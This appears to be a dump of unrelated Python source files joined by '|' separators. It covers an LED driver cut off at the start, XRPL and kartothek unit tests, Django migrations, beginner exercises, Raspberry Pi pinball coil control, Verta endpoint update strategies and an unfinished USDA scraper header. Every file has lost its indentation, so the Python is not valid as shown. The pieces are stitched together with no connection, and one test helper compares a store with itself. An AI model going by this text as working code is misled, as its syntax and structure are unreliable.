"""P981X RGB LED Driver"""
def __init__(self, leds = 2):
"""Initialize the P981X using file python library
leds:the LED's chain length (defult leds = 2)
"""
self.Path = '/proc/device-tree/p981x_1057@20'
self.P981x0 = '/dev/p981x0'
try:
# Check BB-GPIO-P9813 whether install successfully
# if not reinstall it
if not os.path.exists(self.Path):
InstallDTBO('BB-GPIO-P9813')
while not os.path.exists(self.Path):
time.sleep(0.1)
#Open the /dev/p981x0 using file python library
self.f = open(self.P981x0, 'w')
#Set the LED's chain length
self.f.write('N %d\n'%leds)
self.f.flush()
except IOError as err:
print("File Error:"+str(err))
print("maybe you should reinstall the driver of p981x")
def set(self, led, red, green, blue):
"""Set LED's value of R,G,B
led:which one on LED's chain(defult 0 or 1)
red:The value that describes R of R,G,B(0~255)
green:The value that describes G of R,G,B(0~255)
blue:The value that describes B of R,G,B(0~255)
"""
try:
self.f.write('D %d %d %d %d\n'%(led,red,green,blue))
self.f.flush()
except IOError as err:
print("File Error:"+str(err))
print("maybe you should reinstall the driver of p981x")
def main():
LED = P981X()
while True:
LED.set(0,0x20,0,0)
LED.set(1,0,0x20,0)
time.sleep(0.25)
LED.set(0,0,0x20,0)
LED.set(1,0x20,0,0)
time.sleep(0.25)
if __name__ == "__main__":
main() |
from unittest import TestCase
from xrpl.models.exceptions import XRPLModelException
from xrpl.models.transactions import AccountSet
_ACCOUNT = "r9LqNeG6qHxjeUocjvVki2XR35weJ9mZgQ"
_FEE = "0.00001"
_SEQUENCE = 19048
class TestAccountSet(TestCase):
def test_same_set_flag_and_clear_flag(self):
set_flag = 3
clear_flag = 3
domain = "asjcsodafsaid0f9asdfasdf"
transaction_dict = {
"account": _ACCOUNT,
"fee": _FEE,
"set_flag": set_flag,
"clear_flag": clear_flag,
"domain": domain,
"sequence": _SEQUENCE,
}
with self.assertRaises(XRPLModelException):
AccountSet(**transaction_dict)
def test_uppercase_domain(self):
clear_flag = 3
domain = "asjcsodAOIJFsaid0f9asdfasdf"
transaction_dict = {
"account": _ACCOUNT,
"fee": _FEE,
"clear_flag": clear_flag,
"domain": domain,
"sequence": _SEQUENCE,
}
with self.assertRaises(XRPLModelException):
AccountSet(**transaction_dict)
def test_invalid_tick_size(self):
clear_flag = 3
tick_size = 39
transaction_dict = {
"account": _ACCOUNT,
"fee": _FEE,
"clear_flag": clear_flag,
"tick_size": tick_size,
"sequence": _SEQUENCE,
}
with self.assertRaises(XRPLModelException):
AccountSet(**transaction_dict)
def test_invalid_transfer_rate(self):
clear_flag = 3
transfer_rate = 39
transaction_dict = {
"account": _ACCOUNT,
"fee": _FEE,
"clear_flag": clear_flag,
"transfer_rate": transfer_rate,
"sequence": _SEQUENCE,
}
with self.assertRaises(XRPLModelException):
AccountSet(**transaction_dict)
|
# -*- coding: utf-8 -*-
import pandas as pd
import pytest
from kartothek.api.discover import discover_datasets_unchecked
from kartothek.core.cube.cube import Cube
from kartothek.io.eager import copy_dataset
from kartothek.io.eager_cube import build_cube, query_cube
from kartothek.utils.ktk_adapters import get_dataset_keys
__all__ = (
"assert_same_keys",
"built_cube",
"cube",
"df_enrich",
"df_seed",
"simple_cube_1",
"simple_cube_2",
"test_fail_blocksize_negative",
"test_fail_blocksize_wrong_type",
"test_fail_blocksize_zero",
"test_fail_no_src_cube",
"test_fail_no_src_cube_dataset",
"test_fail_no_store_factory_src",
"test_fail_no_store_factory_tgt",
"test_fail_stores_identical_overwrite_false",
"test_ignore_other",
"test_invalid_partial_copy",
"test_invalid_partial_copy1",
"test_invalid_partial_copy2",
"test_overwrite_fail",
"test_overwrite_ok",
"test_partial_copy_dataset_dict",
"test_partial_copy_dataset_list",
"test_read_only_source",
"test_simple",
"test_simple_copy_cube_rename_dataset",
"test_simple_copy_cube_rename_cube_prefix",
"test_simple_copy_cube_rename_cube_prefix_and_dataset",
"test_copy_fail_overwrite_true",
"test_copy_fail_overwrite_false",
"test_simple_rename_cube_same_stores",
)
@pytest.fixture
def cube():
return Cube(dimension_columns=["x"], partition_columns=["p"], uuid_prefix="cube")
@pytest.fixture
def df_seed():
return pd.DataFrame({"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v1": [10, 11, 12, 13]})
@pytest.fixture
def df_enrich():
return pd.DataFrame({"x": [0, 1, 2, 3], "p": [0, 0, 1, 1], "v2": [10, 11, 12, 13]})
@pytest.fixture
def built_cube(df_seed, df_enrich, cube, function_store):
return build_cube(
data={cube.seed_dataset: df_seed.copy(), "enrich": df_enrich.copy()},
cube=cube,
store=function_store,
)
@pytest.fixture
def simple_cube_1(function_store, built_cube):
return set(function_store().keys())
@pytest.fixture
def simple_cube_2(df_seed, df_enrich, cube, function_store2):
build_cube(data={cube.seed_dataset: df_seed}, cube=cube, store=function_store2)
return set(function_store2().keys())
def assert_target_cube_readable(tgt_cube_uuid, tgt_store, df_seed, df_enrich):
tgt_cube = Cube(
dimension_columns=["x"], partition_columns=["p"], uuid_prefix=tgt_cube_uuid
)
tgt_cube_res = query_cube(cube=tgt_cube, store=tgt_store)[0]
assert tgt_cube_res is not None
assert tgt_cube_res[["x", "p", "v1"]].equals(df_seed)
assert tgt_cube_res[["x", "p", "v2"]].equals(df_enrich)
def assert_same_keys(store1, store2, keys):
k1 = set(store1().keys())
k2 = set(store2().keys())
assert keys.issubset(k1)
assert keys.issubset(k2)
for k in sorted(keys):
b1 = store1().get(k)
b2 = store1().get(k)
assert b1 == b2
def test_simple(driver, function_store, function_store2, cube, simple_cube_1):
driver(cube=cube, src_store=function_store, tgt_store=function_store2)
assert_same_keys(function_store, function_store2, simple_cube_1)
def test_simple_copy_cube_rename_dataset(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a dataset while copying, but leave the cube name as is
"""
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
ds_name_old = "enrich"
ds_name_new = "augmented"
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_datasets={ds_name_old: ds_name_new},
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(ds_name_old, ds_name_new)
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(ds_name_old, ds_name_new)
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable("cube", function_store2, df_seed, df_enrich)
def test_simple_copy_cube_rename_cube_prefix(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a cube while copying, but leave the dataset names as they are
"""
old_cube_prefix = "cube"
new_cube_prefix = "my_target_cube"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix=new_cube_prefix,
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable(new_cube_prefix, function_store2, df_seed, df_enrich)
def test_simple_copy_cube_rename_cube_prefix_and_dataset(
driver, function_store, function_store2, cube, simple_cube_1, df_seed, df_enrich
):
"""
Rename a cube and a dataset while copying
"""
old_cube_prefix = "cube"
new_cube_prefix = "my_target_cube"
ds_name_old = "enrich"
ds_name_new = "augmented"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix=new_cube_prefix,
renamed_datasets={ds_name_old: ds_name_new},
)
tgt_keys = function_store2().keys()
for src_key in sorted(simple_cube_1):
tgt_key = src_key.replace(
f"{old_cube_prefix}++", f"{new_cube_prefix}++"
).replace(f"++{ds_name_old}", f"++{ds_name_new}")
assert tgt_key in tgt_keys
src_blob = function_store().get(src_key)
tgt_blob = function_store2().get(tgt_key)
if tgt_key.endswith("by-dataset-metadata.json"):
src_blob_mod = (
src_blob.decode("utf-8")
.replace(f"{old_cube_prefix}++", f"{new_cube_prefix}++")
.replace(f"++{ds_name_old}", f"++{ds_name_new}")
.encode("utf-8")
)
assert src_blob_mod == tgt_blob
else:
assert src_blob == tgt_blob
assert_target_cube_readable(new_cube_prefix, function_store2, df_seed, df_enrich)
def test_simple_rename_cube_same_stores(
driver, function_store, cube, simple_cube_1, df_seed, df_enrich
):
new_cube_prefix = "my_target_cube"
ds_name_old = "enrich"
ds_name_new = "augmented"
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
with pytest.raises(ValueError):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store,
renamed_cube_prefix=new_cube_prefix,
renamed_datasets={ds_name_old: ds_name_new},
)
def test_copy_fail_overwrite_true(
driver, mocker, cube, simple_cube_1, function_store, function_store2
):
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
with pytest.raises(RuntimeError):
with mocker.patch(
"kartothek.io.eager_cube.copy_dataset",
side_effect=ValueError("Copying cube failed horribly."),
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix="new_cube",
overwrite=True,
)
def test_copy_fail_overwrite_false(
driver, mocker, cube, simple_cube_1, function_store, function_store2
):
# NB: only implemented for eager copying so far
if "copy_cube" not in str(driver):
pytest.skip()
def side_effect(*args, **kwargs):
if side_effect.counter == 0:
side_effect.counter += 1
return copy_dataset(*args, **kwargs)
else:
raise ValueError("Something unexpected happened during cube copy.")
side_effect.counter = 0
with mocker.patch("kartothek.io.eager_cube.copy_dataset", side_effect=side_effect):
from kartothek.io_components.cube.write import MultiTableCommitAborted
with pytest.raises(MultiTableCommitAborted):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
renamed_cube_prefix="new_cube",
overwrite=False,
)
# rollback transaction means that only the metadata file is deleted
# therefore we still have remaining parquet files
assert len(function_store2().keys()) == 3
def test_overwrite_fail(
driver, function_store, function_store2, cube, simple_cube_1, simple_cube_2
):
assert simple_cube_1 != simple_cube_2
data_backup = {k: function_store2().get(k) for k in simple_cube_2}
with pytest.raises(RuntimeError) as exc:
driver(cube=cube, src_store=function_store, tgt_store=function_store2)
assert (
str(exc.value)
== 'Dataset "cube++seed" exists in target store but overwrite was set to False'
)
# check everything kept untouched
assert set(function_store2().keys()) == simple_cube_2
for k in sorted(simple_cube_2):
assert function_store2().get(k) == data_backup[k]
def test_overwrite_ok(
driver, function_store, function_store2, cube, simple_cube_1, simple_cube_2
):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, overwrite=True
)
assert_same_keys(function_store, function_store2, simple_cube_1)
@pytest.mark.parametrize("overwrite", [False, True])
def test_fail_stores_identical_overwrite_false(
driver, function_store, cube, built_cube, overwrite
):
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store,
overwrite=overwrite,
)
assert str(exc.value) == "Stores are identical but should not be."
def test_ignore_other(driver, function_store, function_store2):
dfs = []
cubes = []
for i in range(3):
dfs.append(
pd.DataFrame(
{
"x{}".format(i): [0, 1, 2, 3],
"p": [0, 0, 1, 1],
"v{}".format(i): [10, 11, 12, 13],
}
)
)
cubes.append(
Cube(
dimension_columns=["x{}".format(i)],
partition_columns=["p"],
uuid_prefix="cube{}".format(i),
)
)
build_cube(data=dfs[0], cube=cubes[0], store=function_store)
build_cube(data=dfs[1], cube=cubes[1], store=function_store)
build_cube(data=dfs[2], cube=cubes[2], store=function_store2)
keys_in_1 = set(function_store().keys())
keys_in_2 = set(function_store2().keys())
data_backup1 = {k: function_store().get(k) for k in keys_in_1}
data_backup2 = {k: function_store2().get(k) for k in keys_in_2}
driver(cube=cubes[1], src_store=function_store, tgt_store=function_store2)
# store 1 is untouched
assert set(function_store().keys()) == keys_in_1
for k in sorted(keys_in_1):
assert function_store().get(k) == data_backup1[k]
# store 2 is partly untouched
for k in sorted(keys_in_2):
assert function_store2().get(k) == data_backup2[k]
# test new keys
keys_new = set(function_store2().keys()) - keys_in_2
assert_same_keys(function_store, function_store2, keys_new)
def test_invalid_partial_copy1(
df_seed, df_enrich, cube, function_store, function_store2, simple_cube_2, driver
):
# build a cube that would be incompatible w/ simple_cube_2
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store,
)
keys = set(function_store().keys())
# now copy simple_cube_2 over existing cube.
# this only copies the seed table since simple_cube_2 does not have an enrich table.
# it should fail because X is incompatible
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store2,
tgt_store=function_store,
overwrite=True,
)
assert 'Found incompatible entries for column "x"' in str(exc.value)
assert keys == set(function_store().keys())
def test_invalid_partial_copy2(
df_seed, df_enrich, cube, function_store, function_store2, simple_cube_1, driver
):
# build a cube that would be incompatible w/ simple_cube_1
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich2": df_enrich},
cube=cube,
store=function_store2,
)
keys = set(function_store2().keys())
# now copy simple_cube_1 over existing cube.
# this only copies the seed and enrich table since simple_cube_1 does not have an enrich2 table.
# it should fail because X is incompatible.
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=True,
)
assert "Found columns present in multiple datasets" in str(exc.value)
assert keys == set(function_store2().keys())
def test_partial_copy_dataset_list(
driver, function_store, function_store2, cube, built_cube
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
datasets=["seed", "enrich"],
)
all_datasets = discover_datasets_unchecked(
uuid_prefix=cube.uuid_prefix,
store=function_store,
filter_ktk_cube_dataset_ids=["seed", "enrich"],
)
copied_ds_keys = set()
copied_ds_keys |= get_dataset_keys(all_datasets["seed"])
copied_ds_keys |= get_dataset_keys(all_datasets["enrich"])
tgt_store_keys = set(function_store2().keys())
assert copied_ds_keys == tgt_store_keys
def test_partial_copy_dataset_dict(
driver, function_store, function_store2, cube, built_cube
):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
datasets={"seed": built_cube["seed"], "enrich": built_cube["enrich"]},
)
all_datasets = discover_datasets_unchecked(
uuid_prefix=cube.uuid_prefix,
store=function_store,
filter_ktk_cube_dataset_ids=["seed", "enrich"],
)
copied_ds_keys = set()
copied_ds_keys |= get_dataset_keys(all_datasets["seed"])
copied_ds_keys |= get_dataset_keys(all_datasets["enrich"])
tgt_store_keys = set(function_store2().keys())
assert copied_ds_keys == tgt_store_keys
def test_invalid_partial_copy(
driver, df_seed, df_enrich, function_store, function_store2, cube, built_cube
):
# build a cube that would be incompatible with cube in function_store
df_seed = df_seed.copy()
df_enrich = df_enrich.copy()
df_seed["x"] = df_seed["x"].astype(str)
df_enrich["x"] = df_enrich["x"].astype(str)
build_cube(
data={cube.seed_dataset: df_seed, "enrich": df_enrich},
cube=cube,
store=function_store2,
)
tgt_store_key_before = set(function_store2().keys())
with pytest.raises(ValueError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=True,
datasets=["enrich"],
)
assert 'Found incompatible entries for column "x"' in str(exc.value)
assert tgt_store_key_before == set(function_store2().keys())
def test_fail_no_store_factory_src(
driver, function_store, function_store2, cube, skip_eager
):
store = function_store()
with pytest.raises(TypeError) as exc:
driver(cube=cube, src_store=store, tgt_store=function_store2, no_run=True)
assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_no_store_factory_tgt(
driver, function_store, function_store2, cube, skip_eager
):
store = function_store2()
with pytest.raises(TypeError) as exc:
driver(cube=cube, src_store=function_store, tgt_store=store, no_run=True)
assert str(exc.value) == "store must be a factory but is HFilesystemStore"
def test_fail_no_src_cube(cube, function_store, function_store2, driver):
with pytest.raises(RuntimeError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=False,
)
assert "not found" in str(exc.value)
def test_fail_no_src_cube_dataset(
cube, built_cube, function_store, function_store2, driver
):
with pytest.raises(RuntimeError) as exc:
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
overwrite=False,
datasets=["non_existing"],
)
assert "non_existing" in str(exc.value)
def test_read_only_source(
driver, function_store_ro, function_store2, cube, simple_cube_1
):
driver(cube=cube, src_store=function_store_ro, tgt_store=function_store2)
assert_same_keys(function_store_ro, function_store2, simple_cube_1)
def test_fail_blocksize_wrong_type(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(TypeError, match="blocksize must be an integer but is str"):
driver(
cube=cube,
src_store=function_store,
tgt_store=function_store2,
blocksize="foo",
)
def test_fail_blocksize_negative(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(ValueError, match="blocksize must be > 0 but is -1"):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, blocksize=-1
)
def test_fail_blocksize_zero(
driver, function_store, function_store2, cube, simple_cube_1, skip_eager
):
with pytest.raises(ValueError, match="blocksize must be > 0 but is 0"):
driver(
cube=cube, src_store=function_store, tgt_store=function_store2, blocksize=0
)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2019-04-16 13:33
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_auto_20190416_2108'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='article',
),
migrations.RemoveField(
model_name='comment',
name='reply',
),
migrations.DeleteModel(
name='Comment',
),
]
|
'''
Desafio K
'''
def reverse(b):
str = ""
for i in b:
str = i + str
return str
n = int(input())
bi = format(n,'b')
bi = reverse(bi)
bi = int(bi,2)
print(bi)
|
#017-2.py
with open("write_sample.txt",'w') as handle:
handle.write("Hello\n")
handle.write("write_sample text file\n")
|
from django.urls import path
from . import views
from polls.Controller.userController import userController
urlpatterns = [
path('', views.index, name="index"),
path('test/', views.test, name="test"),
path('question_list/', views.question_list, name="question_list"),
path('detail_question/<int:question_id>', views.detailView, name="detail_question"),
path('getQuestionById/<int:question_id>', views.getQuestionById, name="getQuestionById"),
# redirect userController
path('getLoginForm', userController.getLoginForm, name="getLoginForm"),
path('postLoginForm', userController.postLoginForm, name="postLoginForm"),
] |
from Switch import Switch
import RPi.GPIO as GPIO
class Scrubmode(object):
HIGH = 0
LOW = 1
def __init__(self,name, coilPinOne,coilPinTwo, GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN,GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN,GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN,GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN,GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN, GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN, GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE):
self.maxTimeEnabled = 0.05
self.timeEnabled = 0.0
self.inTransition = 0
self.transitionState = 0
self.name = name
self.coilPinOne = coilPinOne
self.coilPinTwo = coilPinTwo
self.GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN = GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN
self.GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN = GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN
self.GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN = GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN
self.GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN = GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN
self.GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN = GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN
self.GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN = GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN
self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE = GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE
def update(self, deltaTime):
if self.inTransition == 0:
#rhea heeft dit en de volgende elif aangepast, omdat er geen rechtsBovenSwitch en rechtsBenedenSwitch bestond
if self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 0 and (self.GPB2_L_BVN8_S7_GELE_TARGET_RECHTS_BOVEN.getState() == 1 or self.GPA5_L_OND8_S14_GELE_TARGET_LINKS_BOVEN.getState() == 1):
self.timeEnabled = 0
self.transitionState = 2
self.inTransition = 1
GPIO.output(self.coilPinOne, self.HIGH)
GPIO.output(self.coilPinTwo, self.HIGH)
elif self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1 and (self.GPA6_L_OND9_S18_GELE_TARGET_LINKS_MIDDEN.getState() == 1 or self.GPB1_L_BVN9_S3_GELE_TARGET_RECHTS_MIDDEN.getState() == 1):
self.timeEnabled = 0
GPIO.output(self.coilPinOne, self.HIGH)
self.inTransition = 2
elif self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1 and (self.GPA7_L_OND10_S20_GELE_TARGET_LINKS_BENEDEN.getState() == 1 or self.GPB0_L_BVN10_S1_GELE_TARGET_RECHTS_BENEDEN.getState() == 1):
self.timeEnabled = 0
GPIO.output(self.coilPinOne, self.HIGH)
self.inTransition = 2
elif self.inTransition == 1:
self.timeEnabled += deltaTime
if self.transitionState == 1:
#print "state 1 --" + str(self.timeEnabled)
if self.timeEnabled>self.maxTimeEnabled:
self.transitionState = 2
GPIO.output(self.coilPinTwo, self.HIGH)
self.timeEnabled = 0
elif self.transitionState == 2:
#print "state 2"
if self.timeEnabled>self.maxTimeEnabled:
self.transitionState = 3
GPIO.output(self.coilPinOne, self.LOW)
self.timeEnabled = 0
elif self.transitionState == 3:
#print "state 3"
if self.timeEnabled>self.maxTimeEnabled:
self.transitionState = 0
GPIO.output(self.coilPinTwo, self.LOW)
self.timeEnabled = 0
self.inTransition = 0
elif self.inTransition == 2:
self.timeEnabled += deltaTime
if self.timeEnabled>self.maxTimeEnabled:
self.timeEnabled = 0
GPIO.output(self.coilPinOne, self.LOW)
self.inTransition = 0
return 0
def disable(self):
self.enabled = False
GPIO.output(self.coilPinTwo, self.LOW)
while self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState() == 1:
GPIO.output(self.coilPinOne, self.HIGH) #veilig om dit te doen?
GPIO.output(self.coilPinOne, self.LOW)
def __str__(self):
return "coil enabled: %s" % (self.GPB5_R_BVN3_S101_RODE_KNOP_SCROBMODE.getState())
|
a = input('Enter value for a')
b = input('Enter value for b')
try:
a = int(a)
b = int(b)
result = a / b
print(result)
print(name)
except ValueError:
print('Give valid input!')
except NameError:
print('undefined variable is called')
except ZeroDivisionError:
print('Cannot divide a number by 0')
|
# Generated by Django 3.1.7 on 2021-03-16 14:57
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('bitsapp', '0004_profile'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='Contact_Email',
),
migrations.RemoveField(
model_name='profile',
name='Name',
),
]
|
#!/usr/bin/env python
from popex.popex_objects import Problem, CatParam
from popex import algorithm
import geostat
import forward
def main():
deesse_simulator = geostat.DeesseSimulator()
flow_solver = forward.FlowSolver(path_results = 'modflow')
problem = Problem(generate_m=deesse_simulator.generate_m, # model generation function
compute_log_p_lik=flow_solver.compute_log_p_lik, # log likelihood (forward)
get_hd_pri=deesse_simulator.get_hd_pri) # prior hard conditioning
algorithm.run_popex_mp(pb=problem,
path_res='popex',
path_q_cat=None,
nmp=40,
nmax=1000,
ncmax=(10,),
n_prior=1000)
if __name__=='__main__':
main()
|
# -*- coding:utf8 -*-
import unittest
from radikowave.api import RadikoApi, RadikoArea, RadikoStation
__author__ = 'attakei'
class AreaTest(unittest.TestCase):
def test_get_id(self):
self.assertEqual(RadikoArea.Hokkaido.get_id(), 'JP1')
self.assertEqual(RadikoArea.Okinawa.get_id(), 'JP47')
def test_as_property(self):
self.assertEqual(RadikoArea.Hokkaido.area_id, 'JP1')
class StationTest(unittest.TestCase):
def test_from_dom(self):
dom_base = """<station>
<id>HBC</id>
<name>HBCラジオ</name>
<ascii_name>HBC RADIO</ascii_name>
<href>http://www.hbc.co.jp/radio/index.html</href>
<logo_xsmall>http://radiko.jp/station/logo/HBC/logo_xsmall.png</logo_xsmall>
<logo_small>http://radiko.jp/station/logo/HBC/logo_small.png</logo_small>
<logo_medium>http://radiko.jp/station/logo/HBC/logo_medium.png</logo_medium>
<logo_large>http://radiko.jp/station/logo/HBC/logo_large.png</logo_large>
<logo width="124" height="40">http://radiko.jp/v2/static/station/logo/HBC/124x40.png</logo>
<logo width="344" height="80">http://radiko.jp/v2/static/station/logo/HBC/344x80.png</logo>
<logo width="688" height="160">http://radiko.jp/v2/static/station/logo/HBC/688x160.png</logo>
<logo width="172" height="40">http://radiko.jp/v2/static/station/logo/HBC/172x40.png</logo>
<logo width="224" height="100">http://radiko.jp/v2/static/station/logo/HBC/224x100.png</logo>
<logo width="448" height="200">http://radiko.jp/v2/static/station/logo/HBC/448x200.png</logo>
<logo width="112" height="50">http://radiko.jp/v2/static/station/logo/HBC/112x50.png</logo>
<logo width="168" height="75">http://radiko.jp/v2/static/station/logo/HBC/168x75.png</logo>
<logo width="258" height="60">http://radiko.jp/v2/static/station/logo/HBC/258x60.png</logo>
<feed>http://radiko.jp/station/feed/HBC.xml</feed>
<banner>http://radiko.jp/res/banner/HBC/20110922161828.png</banner>
</station>"""
import xml.etree.ElementTree as ET
stations_root = ET.fromstring(dom_base)
station = RadikoStation.from_dom(stations_root)
self.assertIsInstance(station, RadikoStation)
self.assertEqual(station.id, 'HBC')
self.assertEqual(station.name, 'HBCラジオ')
class ApiTest(unittest.TestCase):
def test_init_default_area(self):
api = RadikoApi()
self.assertEqual(api.area, RadikoArea.Tokyo)
def test_init_specify_area(self):
api = RadikoApi(RadikoArea.Chiba)
self.assertEqual(api.area, RadikoArea.Chiba)
def test_featch_stations(self):
api = RadikoApi(RadikoArea.Hokkaido)
stations = api.fetch_stations()
self.assertIsInstance(stations, list)
self.assertEqual(len(stations), 7)
for station in stations:
self.assertIsInstance(station, RadikoStation)
|
# Generated by Django 3.2.9 on 2021-11-03 13:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('materials', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='materialfile',
name='name',
field=models.CharField(default='name', help_text='Name associated with the file.', max_length=100),
preserve_default=False,
),
]
|
# -*- coding: utf-8 -*-
import abc
from ..._vendored import six
from .rules import _UpdateRule
@six.add_metaclass(abc.ABCMeta)
class _UpdateStrategy(object):
_STRATEGY = ""
@abc.abstractmethod
def _as_build_update_req_body(self):
"""
Returns
-------
dict
JSON to be passed as the body for an Endpoint update request.
"""
pass
class DirectUpdateStrategy(_UpdateStrategy):
"""A direct endpoint update strategy.
The JSON equivalent for this is:
.. code-block:: json
{
"strategy": "direct"
}
Represents direct update strategy for Endpoint.
Examples
--------
.. code-block:: python
from verta.endpoint.update import DirectUpdateStrategy
strategy = DirectUpdateStrategy()
"""
_STRATEGY = "rollout"
def _as_build_update_req_body(self):
return {
"strategy": self._STRATEGY,
}
class CanaryUpdateStrategy(_UpdateStrategy):
"""A rule-based canary endpoint update strategy.
The JSON equivalent for this is:
.. code-block:: json
{
"strategy": "canary",
"canary_strategy": {
"progress_step": 0.2,
"progress_interval_seconds": 10,
"rules": []
}
}
Represents canary update strategy for Endpoint.
Parameters
----------
interval : int
Rollout interval, in seconds.
step : float in (0, 1]
Ratio of deployment to roll out per `interval`.
Examples
--------
.. code-block:: python
from verta.endpoint.update import CanaryUpdateStrategy
strategy = CanaryUpdateStrategy(interval=10, step=.1)
"""
_STRATEGY = "canary"
def __init__(self, interval, step):
interval_err_msg = "`interval` must be int greater than 0"
if not isinstance(interval, int):
raise TypeError(interval_err_msg)
if not interval > 0:
raise ValueError(interval_err_msg)
step_err_msg = "`step` must be float in (0, 1]"
if not isinstance(step, float):
raise TypeError(step_err_msg)
if not 0 < step <= 1:
raise ValueError(step_err_msg)
self._progress_interval_seconds = interval
self._progress_step = step
self._rules = []
def _as_build_update_req_body(self):
if not self._rules:
raise RuntimeError("canary update strategy must have at least one rule")
return {
"strategy": self._STRATEGY,
"canary_strategy": {
"progress_interval_seconds": self._progress_interval_seconds,
"progress_step": self._progress_step,
"rules": list(map(lambda rule: rule._as_dict(), self._rules)),
},
}
def add_rule(self, rule):
if not isinstance(rule, _UpdateRule):
raise TypeError(
"strategy must be an object from verta.endpoint.update_rules"
)
self._rules.append(rule)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 04 10:13:02 2014
@author: nataliecmoore
Script Name: USDA_GX_GR110_SCRAPER
Purpose:
Retrieve daily USDA data from the GX_GR110 report via the USDA LMR
web service for upload to Quandl.com. The script pulls data for
the minimum and maximum bids for the past 15 days and past 15-30 days for
soybeans, corn, and srw wheat.
Approach:
Used python string parsing to extract the minimum and maximum bids and
then format in a table for upload to Quandl.com
Author: Natalie Moore
History:
Date Author Purpose
----- ------- -----------
